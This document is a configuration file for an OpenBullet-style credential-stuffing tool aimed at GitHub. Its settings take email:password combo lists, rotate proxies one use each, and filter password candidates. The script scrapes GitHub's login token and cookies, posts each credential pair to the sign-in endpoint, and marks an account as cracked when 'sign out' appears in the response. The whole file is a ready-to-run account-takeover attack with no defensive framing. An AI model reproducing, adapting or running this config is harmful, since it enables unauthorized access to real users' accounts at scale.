[SETTINGS]
{
  "Name": "github",
  "SuggestedBots": 19,
  "LastModified": "2018-11-21T14:36:59.2205045+00:00",
  "AdditionalInfo": "",
  "Author": "pin2",
  "Version": "1.0.0",
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 1,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "None",
  "DataRules": [
    {
      "SliceName": "USER",
      "RuleType": 2,
      "RuleString": "1",
      "Id": 1586429239
    },
    {
      "SliceName": "PASS",
      "RuleType": 2,
      "RuleString": "8",
      "Id": 1114543623
    },
    {
      "SliceName": "PASS",
      "RuleType": 0,
      "RuleString": "Lowercase",
      "Id": 909356694
    },
    {
      "SliceName": "PASS",
      "RuleType": 0,
      "RuleString": "Digit",
      "Id": 976956420
    }
  ],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
#GET_Cookies REQUEST GET "https://github.com/session" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
#GET_TOK PARSE "<SOURCE>" LR "authenticity_token\" value=\"" "\"" Recursive=FALSE -> VAR "authenticity_token" "" "" 
#logged_in_COO PARSE "<COOKIES(logged_in)>" LR "" "" Recursive=FALSE -> VAR "logged_in" "" "" 
#_gh_sess_COO PARSE "<COOKIES(_gh_sess)>" LR "" "" Recursive=FALSE -> VAR "_gh_sess" "" "" 
#has_recent_activity PARSE "<COOKIES(has_recent_activity)>" LR "" "" Recursive=FALSE -> VAR "has_recent_activity" "" "" 
#POST_LOGIN REQUEST POST "https://github.com/session" AutoRedirect=TRUE 
  CONTENT "commit=Sign+in&utf8=%E2%9C%93&authenticity_token=<authenticity_token>&login=<USER>&password=<PASS>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Host: github.com" 
  HEADER "Origin: https://github.com" 
  HEADER "Upgrade-Insecure-Requests: 0" 
  HEADER "Referer: https://github.com/login" 
  HEADER "Cookie: logged_in=<logged_in>; _ga=GA1.2.1417049618.1541448356; _octo=GH1.1.1093120533.1541448357; has_recent_activity=<has_recent_activity>; _gat=1; tz=Europe%; _gh_sess=<_gh_sess>" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Success OR 
    KEY "Header, sign out" 
  KEYCHAIN Failure OR 
    KEY "Your browser did something unexpected" 
